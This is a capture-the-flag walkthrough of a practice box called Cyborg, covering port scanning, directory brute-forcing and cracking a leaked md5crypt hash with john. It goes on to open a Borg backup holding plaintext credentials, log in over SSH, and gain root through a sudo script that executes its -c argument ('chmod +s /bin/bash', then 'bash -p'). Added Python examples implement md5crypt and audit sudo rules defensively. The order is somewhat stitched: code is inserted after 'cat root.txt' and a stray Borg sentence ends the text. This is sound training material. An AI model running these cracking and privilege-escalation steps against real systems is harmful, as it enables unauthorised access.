
Cyborg

Last updated 2 years ago

A box involving encrypted archives, source code analysis and more.

1. Scanning

1.1 Nmap

Using nmap to identify the open ports and the services behind them:

nmap -Pn -sC -sV 10.10.116.223   

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 12:19 IST
Nmap scan report for 10.10.116.223
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
5357/tcp filtered wsdapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.39 seconds
  • We find two open ports: 22 (OpenSSH 7.2p2) and 80 (Apache 2.4.18). Port 5357 shows as filtered.

  • Port 80 serves only the default Apache landing page

2. Reconnaissance

2.1 Gobuster

  • Directory brute-forcing on port 80 with gobuster:

gobuster dir -u http://10.10.116.223 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.116.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/16 12:20:00 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 314] [--> http://10.10.116.223/admin/]
/etc                  (Status: 301) [Size: 312] [--> http://10.10.116.223/etc/]  
/server-status        (Status: 403) [Size: 278]                                  
                                                                                 
===============================================================
2022/07/16 12:25:45 Finished
===============================================================
  • Browsing the /etc directory, we find a password hash for the user music_archive at /etc/squid/passwd

2.2 John

  • Copying the hash into hash.txt and running john against it with rockyou.txt:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2022-07-16 12:43) 1.666g/s 64960p/s 64960c/s 64960C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • John cracks it in under a second: the password is squidward
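The hash john loaded is md5crypt, the crypt(3) `$1$` scheme: one MD5 over password, magic and salt, followed by a fixed 1000 MD5 rounds. There is no tunable cost, which is why a single CPU core tries about 65,000 candidates per second in the output above. The Python below is an added example, not part of the writeup; it implements `$1$` from scratch with hashlib so the format can be generated and checked offline. The actual hash from /etc/squid/passwd is not reproduced on this page, so the example builds its own hash from a constructed salt.

```python
import hashlib
import secrets
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value: int, count: int) -> str:
    """crypt(3) base64: emit `count` 6-bit groups of `value`, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Return the crypt(3) $1$ (md5crypt) hash of `password` under `salt` (at most 8 chars)."""
    pw = password.encode()
    sb = salt.encode()[:8]
    ctx = hashlib.md5(pw + MAGIC + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    # Mix in the alternate sum, one byte of it per byte of password.
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, remaining)])
    # Fold the password length into the hash, bit by bit (a NUL for 1-bits,
    # the first password byte for 0-bits; this quirk is part of the spec).
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 fixed stretching rounds: no work factor, hence the high crack rate.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sb)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # The 16 result bytes are re-ordered in triples before encoding.
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    )
    encoded += _to64(final[11], 2)
    return "$1$" + sb.decode() + "$" + encoded


def verify(password: str, stored: str) -> bool:
    """Check a candidate against a stored $1$ hash; the final compare is constant-time."""
    if not stored.startswith("$1$"):
        raise ValueError("not an md5crypt hash")
    salt = stored.split("$")[2]
    return secrets.compare_digest(md5crypt(password, salt), stored)


def dictionary_check(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches `stored`, or None (what john does, minus the speed)."""
    for cand in candidates:
        if verify(cand, stored):
            return cand
    return None


if __name__ == "__main__":
    # Constructed sample: salt "abcdefgh" is made up; the password is the one cracked above.
    h = md5crypt("squidward", "abcdefgh")
    print(h)
    print(dictionary_check(h, ["123456", "password", "squidward"]))
```

The defensive takeaway is that a md5crypt hash leaked from a web-readable path is effectively a plaintext once it is in a wordlist; where the authenticating application supports it, a scheme with a tunable cost such as bcrypt should be used, and the passwd file should never sit under the document root.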

2.3 /admin

  • Going to the /admin directory

  • Navigating to /admin/admin.html, we find a chat conversation

  • It mentions a squid proxy and a backup called music_archive, and gives us potential usernames: Josh, Adam and Alex

  • The archive itself can be downloaded from the /admin homepage

  • Downloading archive.tar and extracting it:

tar -xvf archive.tar 

home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1
  • The README tells us this is a Borg Backup repository and links to its documentation:

cat home/field/dev/final_archive/README 

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

2.4 Borg Backup

  • Borg can be installed on a Debian-based system with apt install borgbackup

  • borg list with the repository path lists the archives it contains. It prompts for a passphrase, and squidward, the password cracked from the squid hash, unlocks it:

borg list home/field/dev/final_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 19:30:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
  • borg extract with the repository path and the archive name (separated by ::) restores the files:

borg extract home/field/dev/final_archive/::music_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
~/Desktop/Pentest/THM/cyborg ❯ ls                                                                            5s
archive.tar  hash.txt  home
~/Desktop/Pentest/THM/cyborg ❯ cd home 
~/Desktop/Pentest/THM/cyborg/home ❯ ls
alex  field
  • The archive's contents are extracted under the home directory

  • There is a note.txt in home/alex/Documents:

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

These are probably Alex's login credentials:

alex : S3cretP@s3

3. Gaining Access

3.1 SSH

  • We can ssh into the target with the credentials that we found.

ssh alex@10.10.116.223

The authenticity of host '10.10.116.223 (10.10.116.223)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.116.223' (ECDSA) to the list of known hosts.
alex@10.10.116.223's password: 

Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
  • Checking sudo -l, we see that alex can run /etc/mp3backups/backup.sh as root without a password:

sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

4. Privilege Escalation

  • Reading the script, we find that it compresses mp3 files into an archive and, at the end, executes whatever command is passed to it with -c:

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
	case "${flag}" in 
		c) command=${OPTARG};;
	esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd
  • We can pass any command through -c, and it runs as root. Setting the SUID bit on /bin/bash and starting it with bash -p gives a root shell:

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"
/home/alex/Music/image12.mp3
/home/alex/Music/image7.mp3
/home/alex/Music/image1.mp3
/home/alex/Music/image10.mp3
/home/alex/Music/image5.mp3
/home/alex/Music/image4.mp3
/home/alex/Music/image3.mp3
/home/alex/Music/image6.mp3
/home/alex/Music/image8.mp3
/home/alex/Music/image9.mp3
/home/alex/Music/image11.mp3
/home/alex/Music/image2.mp3

bash-4.3$ bash -p
bash-4.3# whoami
root
bash-4.3# cd /root/
bash-4.3# ls
root.txt
bash-4.3# cat root.txt 
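The root cause is the last line of the script, `cmd=$($command)`: the value passed with -c is handed to the shell for execution, and the sudo rule runs the whole script as root without a password. The Python below is an added audit example, not code from the writeup or from the box; it parses the `sudo -l` output shown above, tracks which variables in a script derive from caller input (getopts OPTARG, positional parameters) and reports the lines where such a variable is executed rather than passed as data. The sample inputs are the rule and the relevant script lines copied from this page; the patterns it recognises are a heuristic, not a full bash parser.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed sample input: the `sudo -l` output from the writeup.
SUDO_L_OUTPUT = r"""Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""

# Constructed sample input: the lines of backup.sh that matter, abridged from the box.
BACKUP_SH = r"""#!/bin/bash
while getopts c: flag
do
    case "${flag}" in
        c) command=${OPTARG};;
    esac
done
tar czf $dest/$archive_file $backup_files
cmd=$($command)
echo $cmd
"""


class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


class Finding(NamedTuple):
    line_no: int
    variable: str
    line: str


# "(runas) TAG: command" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")
# name=value, also when it follows a case arm like "c)" or a ';'
ASSIGN_RE = re.compile(r"(?:^|[\s;)])([A-Za-z_]\w*)=([^;]*)")
# Values a caller controls: getopts arguments and positional parameters
TAINT_SOURCE_RE = re.compile(r"\$\{?(OPTARG|[1-9]|@|\*)\}?")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rules that follow the 'may run the following commands' header."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(","):
            rules.append(SudoRule(runas.strip(), "NOPASSWD:" in tags, cmd.strip()))
    return rules


def _ref(var: str) -> str:
    """Regex matching $var or ${var}."""
    return rf"\$(?:\{{{var}\}}|{var}\b)"


def find_tainted_exec(script: str) -> List[Finding]:
    """Flag lines where a caller-controlled variable is executed instead of used as data.

    Taint propagates through assignments. Sinks: $(...), backticks, eval, and a
    bare "$var" at the start of a command. Comment stripping is crude (a '#'
    inside quotes ends the line), which is acceptable for an audit heuristic.
    """
    tainted: set = set()
    findings: List[Finding] = []
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.split("#", 1)[0]
        m = ASSIGN_RE.search(line)
        if m:
            name, rhs = m.groups()
            if TAINT_SOURCE_RE.search(rhs) or any(re.search(_ref(t), rhs) for t in tainted):
                tainted.add(name)
        for var in sorted(tainted):
            ref = _ref(var)
            sinks = (rf"\$\(\s*{ref}", rf"`\s*{ref}", rf"\beval\b.*{ref}", rf"^\s*{ref}(\s|$)")
            if any(re.search(s, line) for s in sinks):
                findings.append(Finding(no, var, raw.strip()))
                break
    return findings


def audit(sudo_text: str, scripts: Dict[str, str]) -> List[str]:
    """Cross-reference NOPASSWD rules with the scripts they grant and report execution sinks."""
    report = []
    for rule in parse_sudo_l(sudo_text):
        body = scripts.get(rule.command)
        if not rule.nopasswd or body is None:
            continue
        for f in find_tainted_exec(body):
            report.append(
                f"{rule.command}:{f.line_no}: caller-controlled ${f.variable} is executed "
                f"({f.line}); rule runs as ({rule.runas}) without a password"
            )
    return report


if __name__ == "__main__":
    for item in audit(SUDO_L_OUTPUT, {"/etc/mp3backups/backup.sh": BACKUP_SH}):
        print(item)
```

On a real host the script bodies would be read from the paths the rules name, and a second check worth adding is whether those paths or their parent directories are writable by the sudoer, since that is the other common way a NOPASSWD script becomes a root shell.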

Reading the documentation, we can see that Borg is a backup program with compression and encryption support.